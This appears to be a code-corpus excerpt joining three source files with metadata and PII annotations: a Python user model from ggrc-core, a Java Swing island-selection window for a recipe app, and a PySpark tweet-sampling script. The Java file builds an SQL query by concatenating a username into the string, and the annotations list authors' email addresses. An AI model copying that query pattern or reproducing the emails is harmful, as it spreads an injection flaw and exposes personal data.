_aliases = {
"name": "Name",
"email": {
"display_name": "Email",
"unique": True,
},
"company": "Company",
"user_role": {
"display_name": "Role",
"type": "user_role",
"filter_by": "_filter_by_user_role",
},
}
@classmethod
def _filter_by_user_role(cls, predicate):
from ggrc_basic_permissions.models import Role, UserRole
return UserRole.query.join(Role).filter(
(UserRole.person_id == cls.id) &
(UserRole.context_id == None) &
predicate(Role.name)
).exists()
# Methods required by Flask-Login
def is_authenticated(self):
return True
def is_active(self):
return True # self.active
def is_anonymous(self):
return False
def get_id(self):
return unicode(self.id) # noqa
@validates('language')
def validate_person_options(self, key, option):
return validate_option(self.__class__.__name__, key, option,
'person_language')
@validates('email')
def validate_email(self, key, email):
if not Person.is_valid_email(email):
message = "Must provide a valid email address"
raise ValidationError(message)
return email
@staticmethod
def is_valid_email(val):
# Borrowed from Django
# literal form, ipv4 address (SMTP 4.1.3)
email_re = re.compile(
'^[-!#$%&\'*+\\.\/0-9=?A-Z^_`{|}~]+@([-0-9A-Z]+\.)+([0-9A-Z]){2,4}$',
re.IGNORECASE)
return email_re.match(val) if val else False
@classmethod
def eager_query(cls):
from sqlalchemy import orm
# query = super(Person, cls).eager_query()
# Completely overriding eager_query to avoid eager loading of the
# modified_by relationship
return super(Person, cls).eager_query().options(
orm.joinedload('language'),
orm.subqueryload('object_people'),
)
def _display_name(self):
return self.email
@computed_property
def system_wide_role(self):
"""For choosing the role string to show to the user; of all the roles in
the system-wide context, it shows the highest ranked one (if there are
multiple) or "No Access" if there are none.
"""
# FIXME: This method should be in `ggrc_basic_permissions`, since it
# depends on `Role` and `UserRole` objects
if self.email in getattr(settings, "BOOTSTRAP_ADMIN_USERS", []):
return u"Superuser"
ROLE_HIERARCHY = {
u'gGRC Admin': 0,
u'Editor': 1,
u'Reader': 2,
u'Creator': 3,
}
system_wide_roles = ROLE_HIERARCHY.keys()
unique_roles = set([
user_role.role.name
for user_role in self.user_roles
if user_role.role.name in system_wide_roles
])
if len(unique_roles) == 0:
return u"No Access"
else:
# -1 as default to make items not in this list appear on top
# and thus shown to the user
sorted_roles = sorted(unique_roles,
key=lambda x: ROLE_HIERARCHY.get(x, -1))
return sorted_roles[0]
|
Python
|
ECL-2.0
|
mikecb/ggrc-core/src/ggrc/models/person.py
|
66181c13-bbd3-4c09-a245-2c82b7f0fe6f
|
[{"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 172, "end": 197, "context": "nses/LICENSE-2.0 <see LICENSE file>\n# Created By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimpor"}, {"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 215, "end": 240, "context": "ed By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimport re\nfrom sqlalchemy.orm import validates\n\n"}]
|
[{"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 172, "end": 197, "context": "nses/LICENSE-2.0 <see LICENSE file>\n# Created By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimpor"}, {"tag": "EMAIL", "value": "david@reciprocitylabs.com", "start": 215, "end": 240, "context": "ed By: david@reciprocitylabs.com\n# Maintained By: david@reciprocitylabs.com\n\nimport re\nfrom sqlalchemy.orm import validates\n\n"}]
|
/*
* Muhammad Faisal Amir
* f.miir117@gmail.com
* id.amirisback.bandung
* Copyright 2017
*/
package dnb;
import java.awt.Color;
import java.awt.Graphics2D;
import java.awt.image.BufferedImage;
import java.io.File;
import javax.imageio.ImageIO;
import javax.swing.ImageIcon;
/**
*
* @author Faisal Amir
*/
public class daerah extends javax.swing.JFrame {
connection conn = new connection();
private String sql = "";
private String id_pulau = "";
private int lebar, tinggi;
private Object get_username;
/**
* Creates new form index
*/
public daerah(Object get_username) {
this.get_username=get_username;
initComponents();
conn.ConnectToDB();
resizeImage();
showNama();
}
private daerah(){
}
public void showNama(){
try {
sql = "Select * From data_akun where username = '"+get_username+"'";
conn.setStatement(conn.getConnect().createStatement());
conn.setResultSet(conn.getStatement().executeQuery(sql));
while (conn.getResultSet().next()){
txt_nama.setText(conn.getResultSet().getString("nama"));
}
} catch (Exception e) {
}
}
public void resizeImage(){
try {
File foto = new File("../dnb/src/dnb/Icon/peta.png");
BufferedImage imgUkuranAsli = ImageIO.read(foto);
lebar = panel_gambar.getWidth();
tinggi = panel_gambar.getHeight();
BufferedImage imgResize = new BufferedImage(lebar, tinggi, BufferedImage.TYPE_INT_ARGB);
Graphics2D imgTampil = imgResize.createGraphics();
imgTampil.drawImage(imgUkuranAsli, 0, 0, lebar, tinggi, null);
imgTampil.dispose();
ImageIcon ImgOut = new ImageIcon(imgResize);
gambar.setText("");
gambar.setIcon(ImgOut);
} catch (Exception e) {
System.out.println(e);
}
}
/**
* This method is called from within the constructor to initialize the form.
* WARNING: Do NOT modify this code. The content of this method is always
* regenerated by the Form Editor.
*/
@SuppressWarnings("unchecked")
// <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
private void initComponents() {
jLabel4 = new javax.swing.JLabel();
jPanel1 = new javax.swing.JPanel();
jLabel2 = new javax.swing.JLabel();
jLabel3 = new javax.swing.JLabel();
jPanel3 = new javax.swing.JPanel();
panel_gambar = new javax.swing.JPanel();
btn_jawa = new javax.swing.JLabel();
btn_sumatra = new javax.swing.JLabel();
btn_papua = new javax.swing.JLabel();
btn_nusatenggara = new javax.swing.JLabel();
btn_kalimantan = new javax.swing.JLabel();
btn_sulawesi = new javax.swing.JLabel();
btn_bali = new javax.swing.JLabel();
gambar = new javax.swing.JLabel();
Halo = new javax.swing.JLabel();
txt_nama = new javax.swing.JLabel();
Halo1 = new javax.swing.JLabel();
jLabel4.setText("jLabel4");
setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
jPanel1.setBackground(new java.awt.Color(255, 204, 153));
jLabel2.setFont(new java.awt.Font("Segoe Script", 3, 36)); // NOI18N
jLabel2.setText("Dapur Nusantara Bunda");
jLabel3.setText("Copyright || Dapur Nusantara Bunda 2017");
jPanel3.setBackground(new java.awt.Color(255, 248, 206));
panel_gambar.setLayout(new org.netbeans.lib.awtextra.AbsoluteLayout());
btn_jawa.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_jawa.setForeground(new java.awt.Color(255, 0, 0));
btn_jawa.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_jawa.setText("X");
btn_jawa.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_jawaMouseClicked(evt);
}
});
panel_gambar.add(btn_jawa, new org.netbeans.lib.awtextra.AbsoluteConstraints(230, 280, -1, 40));
btn_sumatra.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_sumatra.setForeground(new java.awt.Color(255, 0, 0));
btn_sumatra.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_sumatra.setText("X");
btn_sumatra.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_sumatraMouseClicked(evt);
}
});
panel_gambar.add(btn_sumatra, new org.netbeans.lib.awtextra.AbsoluteConstraints(110, 140, -1, 40));
btn_papua.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_papua.setForeground(new java.awt.Color(255, 0, 0));
btn_papua.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_papua.setText("X");
btn_papua.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_papuaMouseClicked(evt);
}
});
panel_gambar.add(btn_papua, new org.netbeans.lib.awtextra.AbsoluteConstraints(790, 200, -1, 40));
btn_nusatenggara.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_nusatenggara.setForeground(new java.awt.Color(255, 0, 0));
btn_nusatenggara.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_nusatenggara.setText("X");
btn_nusatenggara.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_nusatenggaraMouseClicked(evt);
}
});
panel_gambar.add(btn_nusatenggara, new org.netbeans.lib.awtextra.AbsoluteConstraints(540, 320, -1, 40));
btn_kalimantan.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_kalimantan.setForeground(new java.awt.Color(255, 0, 0));
btn_kalimantan.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_kalimantan.setText("X");
btn_kalimantan.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_kalimantanMouseClicked(evt);
}
});
panel_gambar.add(btn_kalimantan, new org.netbeans.lib.awtextra.AbsoluteConstraints(340, 130, -1, 40));
btn_sulawesi.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_sulawesi.setForeground(new java.awt.Color(255, 0, 0));
btn_sulawesi.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_sulawesi.setText("X");
btn_sulawesi.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_sulawesiMouseClicked(evt);
}
});
panel_gambar.add(btn_sulawesi, new org.netbeans.lib.awtextra.AbsoluteConstraints(470, 170, -1, 40));
btn_bali.setFont(new java.awt.Font("Arial", 1, 36)); // NOI18N
btn_bali.setForeground(new java.awt.Color(255, 0, 0));
btn_bali.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
btn_bali.setText("X");
btn_bali.addMouseListener(new java.awt.event.MouseAdapter() {
public void mouseClicked(java.awt.event.MouseEvent evt) {
btn_baliMouseClicked(evt);
}
});
panel_gambar.add(btn_bali, new org.netbeans.lib.awtextra.AbsoluteConstraints(360, 310, -1, 40));
gambar.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
gambar.setText("jLabel1");
panel_gambar.add(gambar, new org.netbeans.lib.awtextra.AbsoluteConstraints(0, 0, 873, 377));
Halo.setFont(new java.awt.Font("Arial", 2, 14)); // NOI18N
Halo.setText("Halo,");
txt_nama.setFont(new java.awt.Font("Arial", 2, 14)); // NOI18N
txt_nama.setText("Nama");
Halo1.setFont(new java.awt.Font("Arial", 2, 14)); // NOI18N
Halo1.setText("|| Silahkan Memilih Pulau");
javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3);
jPanel3.setLayout(jPanel3Layout);
jPanel3Layout.setHorizontalGroup(
jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(panel_gambar, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addGroup(jPanel3Layout.createSequentialGroup()
.addGap(14, 14, 14)
.addComponent(Halo)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(txt_nama, javax.swing.GroupLayout.PREFERRED_SIZE, 174, javax.swing.GroupLayout.PREFERRED_SIZE)
.addGap(51, 51, 51)
.addComponent(Halo1, javax.swing.GroupLayout.PREFERRED_SIZE, 182, javax.swing.GroupLayout.PREFERRED_SIZE)
.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
);
jPanel3Layout.setVerticalGroup(
jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel3Layout.createSequentialGroup()
.addGap(18, 18, 18)
.addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(Halo)
.addComponent(txt_nama))
.addComponent(Halo1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(panel_gambar, javax.swing.GroupLayout.DEFAULT_SIZE, 406, Short.MAX_VALUE))
);
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel1Layout.createSequentialGroup()
.addGap(0, 0, Short.MAX_VALUE)
.addComponent(jLabel3))
.addComponent(jPanel3, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
.addContainerGap())
.addGroup(jPanel1Layout.createSequentialGroup()
.addGap(36, 36, 36)
.addComponent(jLabel2, javax.swing.GroupLayout.PREFERRED_SIZE, 495, javax.swing.GroupLayout.PREFERRED_SIZE)
.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGap(6, 6, 6)
.addComponent(jLabel2, javax.swing.GroupLayout.PREFERRED_SIZE, 51, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(jPanel3, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jLabel3)
.addContainerGap())
);
javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
pack();
setLocationRelativeTo(null);
}// </editor-fold>//GEN-END:initComponents
private void btn_sumatraMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_sumatraMouseClicked
    // Remember the selected island, open its recipe list, and close this window.
    id_pulau = "IDP_SUMATRA";
    new list_masakan_user(id_pulau).setVisible(true);
    this.dispose();
}//GEN-LAST:event_btn_sumatraMouseClicked
private void btn_kalimantanMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_kalimantanMouseClicked
    // Remember the selected island, open its recipe list, and close this window.
    id_pulau = "IDP_KALIMANTAN";
    new list_masakan_user(id_pulau).setVisible(true);
    this.dispose();
}//GEN-LAST:event_btn_kalimantanMouseClicked
private void btn_jawaMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_jawaMouseClicked
    // Remember the selected island, open its recipe list, and close this window.
    id_pulau = "IDP_JAWA";
    new list_masakan_user(id_pulau).setVisible(true);
    this.dispose();
}//GEN-LAST:event_btn_jawaMouseClicked
private void btn_sulawesiMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_sulawesiMouseClicked
    // Remember the selected island, open its recipe list, and close this window.
    id_pulau = "IDP_SULAWESI";
    new list_masakan_user(id_pulau).setVisible(true);
    this.dispose();
}//GEN-LAST:event_btn_sulawesiMouseClicked
private void btn_papuaMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_papuaMouseClicked
    // Remember the selected island, open its recipe list, and close this window.
    id_pulau = "IDP_PAPUA";
    new list_masakan_user(id_pulau).setVisible(true);
    this.dispose();
}//GEN-LAST:event_btn_papuaMouseClicked
private void btn_nusatenggaraMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_nusatenggaraMouseClicked
    // Remember the selected island, open its recipe list, and close this window.
    id_pulau = "IDP_NT";
    new list_masakan_user(id_pulau).setVisible(true);
    this.dispose();
}//GEN-LAST:event_btn_nusatenggaraMouseClicked
private void btn_baliMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_baliMouseClicked
    // Remember the selected island, open its recipe list, and close this window.
    id_pulau = "IDP_BALI";
    new list_masakan_user(id_pulau).setVisible(true);
    this.dispose();
}//GEN-LAST:event_btn_baliMouseClicked
/**
 * Application entry point: installs the Nimbus look and feel when available,
 * then shows the island-selection frame on the EDT.
 *
 * @param args the command line arguments (unused)
 */
public static void main(String args[]) {
    /* Set the Nimbus look and feel */
    //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
    /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
     * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html
     */
    try {
        for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
            if ("Nimbus".equals(info.getName())) {
                javax.swing.UIManager.setLookAndFeel(info.getClassName());
                break;
            }
        }
    } catch (ClassNotFoundException ex) {
        java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
    } catch (InstantiationException ex) {
        java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
    } catch (IllegalAccessException ex) {
        java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
    } catch (javax.swing.UnsupportedLookAndFeelException ex) {
        java.util.logging.Logger.getLogger(daerah.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
    }
    // Removed three stray duplicated "</editor-fold>" marker comments left
    // behind by the GUI builder; only one fold is opened above.
    //</editor-fold>
    /* Create and display the form */
    java.awt.EventQueue.invokeLater(new Runnable() {
        public void run() {
            new daerah().setVisible(true);
        }
    });
}
// NetBeans-managed Swing widget fields. The btn_* labels act as clickable
// hotspots over the map image; `gambar` holds the map, `txt_nama` shows the
// logged-in user's name.
// Variables declaration - do not modify//GEN-BEGIN:variables
private javax.swing.JLabel Halo;
private javax.swing.JLabel Halo1;
private javax.swing.JLabel btn_bali;
private javax.swing.JLabel btn_jawa;
private javax.swing.JLabel btn_kalimantan;
private javax.swing.JLabel btn_nusatenggara;
private javax.swing.JLabel btn_papua;
private javax.swing.JLabel btn_sulawesi;
private javax.swing.JLabel btn_sumatra;
private javax.swing.JLabel gambar;
private javax.swing.JLabel jLabel2;
private javax.swing.JLabel jLabel3;
private javax.swing.JLabel jLabel4;
private javax.swing.JPanel jPanel1;
private javax.swing.JPanel jPanel3;
private javax.swing.JPanel panel_gambar;
private javax.swing.JLabel txt_nama;
// End of variables declaration//GEN-END:variables
}
|
Java
|
Apache-2.0
|
amirisback/Desktop-Java-ResepMasakan/src/dnb/daerah.java
|
3220129e-fef1-49f6-96bf-b3ab06da0f01
|
[{"tag": "EMAIL", "value": "f.miir117@gmail.com", "start": 30, "end": 49, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n * Copyright 2017\n */\npa"}, {"tag": "NAME", "value": "Faisal Amir", "start": 299, "end": 310, "context": "\nimport javax.swing.ImageIcon;\n\n/**\n *\n * @author Faisal Amir\n */\npublic class daerah extends javax.swing.JFram"}, {"tag": "NAME", "value": "Muhammad Faisal Amir", "start": 6, "end": 26, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n "}]
|
[{"tag": "EMAIL", "value": "f.miir117@gmail.com", "start": 30, "end": 49, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n * Copyright 2017\n */\npa"}, {"tag": "NAME", "value": "Faisal Amir", "start": 299, "end": 310, "context": "\nimport javax.swing.ImageIcon;\n\n/**\n *\n * @author Faisal Amir\n */\npublic class daerah extends javax.swing.JFram"}, {"tag": "NAME", "value": "Muhammad Faisal Amir", "start": 6, "end": 26, "context": "/*\n * Muhammad Faisal Amir\n * f.miir117@gmail.com\n * id.amirisback.bandung\n "}]
|
import sys
import json
import hashlib
import gc
from operator import *
import shlex
from pyspark import StorageLevel
from pyspark.sql import SQLContext
from pyspark.sql.functions import *
from pyspark.sql.types import *
import numpy as np
from subjectivity_clues import clues
def expect(name, var, expected, op=eq):
    """Checkpoint assertion: verify ``op(var, expected)`` and log the outcome.

    name     -- label used in the log line
    var      -- the actual value observed
    expected -- the value (or bound) it is compared against
    op       -- binary predicate from ``operator`` (defaults to equality)

    Raises Exception(name) when the check fails.
    """
    if op(var, expected):
        log('[checkpoint] {} = {}'.format(name, expected))
    else:
        # Bug fix: the failure branch used to log the *expected* value,
        # hiding the actual one; log both so failures are diagnosable.
        log('[error] {} = {} (expected {})'.format(name, var, expected))
        raise Exception(name)
def log(message):
    """Append ``message`` plus a newline to the fixed run log and echo to stdout."""
    log_file = 'sample_subjectivity_tweets.log'
    # The with-statement flushes and closes the file on exit; the explicit
    # flush()/close() calls of the original were redundant.
    with open(log_file, 'a') as f:
        f.write(message)
        f.write('\n')
    # print() is valid in both Python 2 and 3; the bare `print message`
    # statement was Python 2-only and a SyntaxError under Python 3.
    print(message)
def to_json(name, jsons):
    """Write each JSON string in ``jsons`` as one line of ``<name>.json``."""
    out_path = '{}.json'.format(name)
    with open(out_path, 'w') as f:
        f.writelines(record + '\n' for record in jsons)
def to_csv(name, jsons):
    """Write id/verb/postedTime/body of each tweet JSON string to ``<name>.csv``.

    Newlines in the body become spaces, carriage returns are dropped, and
    double quotes are doubled (RFC-4180 style escaping).
    """
    out_path = '{}.csv'.format(name)
    with open(out_path, 'w') as f:
        for raw in jsons:
            tweet = json.loads(raw)
            body = tweet['body'].replace('\n', ' ').replace('\r', '').replace('"', '""')
            line = '"{}",{},{},"{}"\n'.format(tweet['id'], tweet['verb'], tweet['postedTime'], body)
            f.write(line)
def sample(rdd, size, seed):
    """Deterministically draw ``size`` distinct items from ``rdd``.

    Collects the RDD to the driver, samples without replacement using a
    seeded numpy RNG, verifies uniqueness, and returns a plain list.
    """
    population = rdd.collect()
    rng = np.random.RandomState(seed)
    chosen = rng.choice(population, size=size, replace=False)
    expect('sampled', len(set(chosen)), size)
    return chosen.tolist()
def sha(name, ext='json'):
    """Return the SHA-1 hex digest of ``<name>.<ext>``, read in 64 KiB chunks."""
    digest = hashlib.sha1()
    with open('{}.{}'.format(name, ext), 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()
def read_and_parse_clues():
    """Load the MPQA subjectivity lexicon into a {word: clue-dict} mapping.

    Each line of the .tff file is a series of key=value tokens (shlex handles
    quoted values). If a word appears more than once, the last entry wins.
    """
    import os  # bug fix: `os` was used here but never imported in this module
    DEFAULT_FILENAME = os.getcwd() + os.sep + 'subjectivity_clues' + os.sep + 'subjclueslen1-HLTEMNLP05.tff'
    with open(DEFAULT_FILENAME, 'r') as f:
        lines = f.readlines()
    clues = dict()
    for l in lines:
        clue = dict(token.split('=') for token in shlex.split(l))
        clues[clue['word1']] = clue
    return clues
def calculate_relevant(lexicons, sentence):
    """Score a sentence with the subjectivity lexicon.

    Each space-delimited token present in ``lexicons`` contributes its prior
    polarity (+1 positive, -1 negative, 0 both/neutral) weighted by clue
    strength (2 strong, 1 weak). Tokens not in the lexicon are ignored.
    Returns the integer total.
    """
    PRIORPOLARITY = {
        'positive': 1,
        'negative': -1,
        'both': 0,
        'neutral': 0
    }
    TYPE = {
        'strongsubj': 2,
        'weaksubj': 1
    }
    total_score = 0
    for w in sentence.split(' '):
        # Single dict lookup instead of `w not in lexicons.keys()`, which on
        # Python 2 materializes a list and scans it for every token.
        clue = lexicons.get(w)
        if clue is None:
            continue
        total_score += PRIORPOLARITY[clue['priorpolarity']] * TYPE[clue['type']]
    return total_score
# Make sure Python uses UTF-8 as tweets contains emoticon and unicode
# NOTE(review): reload()/setdefaultencoding() is a Python 2-only idiom.
reload(sys)
sys.setdefaultencoding('utf-8')
# Use SQLContext for better support
# NOTE(review): `sc` (the SparkContext) is assumed to be injected by the
# pyspark shell / spark-submit driver; it is not defined in this file.
sqlContext = SQLContext(sc)
# Define storage level
DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
MEMORY_AND_DISK = StorageLevel(True, True, False, False, 1)
# Read GNIP's JSON file
directory = "tweets"
datasets = sqlContext.read.json(directory)
log('# Completed reading JSON files')
# Check checksum count — the hard-coded totals below pin the exact input
# corpus; any other data set will fail these checkpoints by design.
file_count = datasets.where(datasets['verb'].isNull()).count()
expect('file_count', file_count, 21888)
# Check post count
all_posts = datasets.where(datasets['verb'] == 'post')
all_posts_count = all_posts.count()
expect('all_posts_count', all_posts_count, 1570398)
# Check share count
all_shares = datasets.where(datasets['verb'] == 'share')
all_shares_count = all_shares.count()
expect('all_shares_count', all_shares_count, 1112590)
# Check dataset count
info_dataset = datasets.select('info')
info_dataset.registerTempTable('info')
all_tweets_count = info_dataset.select('info.activity_count').groupBy().sum('activity_count').collect()[0][0]
expect('all_tweets_count', all_tweets_count, 2682988)
expect('all_tweets_count', all_tweets_count, all_posts_count + all_shares_count)
log('# Completed validating tweets count')
# Remove post authored by @ChipotleTweet and news agencies
chipotle_tweet = 'id:twitter.com:141341662'
users_to_remove = [chipotle_tweet, 'id:twitter.com:759251', 'id:twitter.com:91478624', 'id:twitter.com:28785486',
'id:twitter.com:1652541', 'id:twitter.com:51241574', 'id:twitter.com:807095',
'id:twitter.com:34713362', 'id:twitter.com:3090733766', 'id:twitter.com:1367531',
'id:twitter.com:14293310', 'id:twitter.com:3108351', 'id:twitter.com:14173315',
'id:twitter.com:292777349', 'id:twitter.com:428333', 'id:twitter.com:624413',
'id:twitter.com:20562637', 'id:twitter.com:13918492', 'id:twitter.com:16184358',
'id:twitter.com:625697849', 'id:twitter.com:2467791', 'id:twitter.com:9763482',
'id:twitter.com:14511951', 'id:twitter.com:6017542', 'id:twitter.com:26574283',
'id:twitter.com:115754870']
all_posts_wo_specific_users = all_posts.where(~ col('actor.id').isin(users_to_remove))
all_posts_w_specific_users = all_posts.where(col('actor.id').isin(users_to_remove)).count()
expect('all_posts_wo_specific_users', all_posts_wo_specific_users.count(), all_posts_count - all_posts_w_specific_users)
# Remove share retweet of tweet by @ChipotleTweet and news agencies
all_shares_wo_specific_users = all_shares.where(~ col('object.actor.id').isin(users_to_remove))
all_shares_w_specific_users = all_shares.where(col('object.actor.id').isin(users_to_remove)).count()
expect('all_shares_wo_specific_users', all_shares_wo_specific_users.count(), all_shares_count - all_shares_w_specific_users)
# Generate tweets pool with only English tweet
tweets_pool = all_posts_wo_specific_users.unionAll(all_shares_wo_specific_users).filter("twitter_lang = 'en'")
tweets_pool.persist(MEMORY_AND_DISK)
tweets_pool_count = tweets_pool.count()
# Adding all post to all share will be greater than tweet pool because of non-English tweet
expected_tweets_pool_count = all_posts_count - all_posts_w_specific_users + \
    all_shares_count - all_shares_w_specific_users
expect('tweets_pool_count', tweets_pool_count, expected_tweets_pool_count, op=lt)
log('# Completed constructing tweets pool')
# Check language of tweets: after the filter there must be exactly one
# distinct language and it must be English.
languages = tweets_pool.select('twitter_lang').distinct()
languages_count = languages.count()
language_check = languages.first()['twitter_lang']
expect('languages_count', languages_count, 1)
expect('language_check', language_check, 'en')
log('# Completed validating language variety')
# Take top 80% of tweets by length (drop the shortest 20th percentile)
tweets_pool_str_lengths = tweets_pool.select(length('body').alias('length')).rdd.map(lambda x: x.length).collect()
lengths_np = np.array(tweets_pool_str_lengths)
p = np.percentile(lengths_np, 20)
final_tweets_pool = tweets_pool.filter(length('body') >= p)
final_tweets_pool.persist(MEMORY_AND_DISK)
tweets_pool.unpersist(blocking=True)
final_tweets_pool_count = final_tweets_pool.count()
percentage_kept = float(final_tweets_pool_count) / tweets_pool_count
expect('percentage_kept', percentage_kept, 0.8, op=gt)
log('# Completed sampling top 80% of tweets by body length')
# Sampling
final_tweets_ids = final_tweets_pool.select(final_tweets_pool['id']).rdd.sortBy(lambda x: x.id).map(lambda x: x.id)
# Development tweets
dev_seed = 10102016
number_of_dev_samples = 3000
dev_posts = sample(final_tweets_ids, number_of_dev_samples, dev_seed)
dev_posts_count = len(dev_posts)
expect('dev_posts_count', dev_posts_count, number_of_dev_samples)
log('# Completed sampling dev tweets')
dev_posts_file = "dev_posts"
dev_posts_jsons = final_tweets_pool[final_tweets_pool['id'].isin(dev_posts)].toJSON().collect()
to_json(dev_posts_file, dev_posts_jsons)
to_csv(dev_posts_file, dev_posts_jsons)
# The SHA-1 pins guarantee the exported files are byte-for-byte reproducible.
expect('dev_posts_file', sha(dev_posts_file), '74447296831c8e3061fc0ee739f549c5b08b85a3')
expect('dev_posts_file', sha(dev_posts_file, ext='csv'), '6acfd1f8d238bc5d25d97d2c9e6f6b177699389a')
log('Exporting dev post to {}'.format(dev_posts_file))
log('# Completed exporting dev tweets')
del dev_posts_jsons
gc.collect()
# Find distinct set of tweets (unique body text)
post_pool = final_tweets_pool.where(final_tweets_pool['verb'] == 'post')
post_pool.persist(MEMORY_AND_DISK)
post_pool_ids = post_pool.select(post_pool['id']).rdd.sortBy(lambda x: x.id).map(lambda x: x.id).collect()
expect('post_pool', post_pool.count(), 1124935)
share_pool = final_tweets_pool.where(final_tweets_pool['verb'] == 'share')
share_pool.persist(MEMORY_AND_DISK)
expect('share_pool', share_pool.count(), 846141)
# A share is "unique" if the tweet it retweets is not already in the post pool.
broadcast_post_ids = sc.broadcast(set(post_pool_ids))
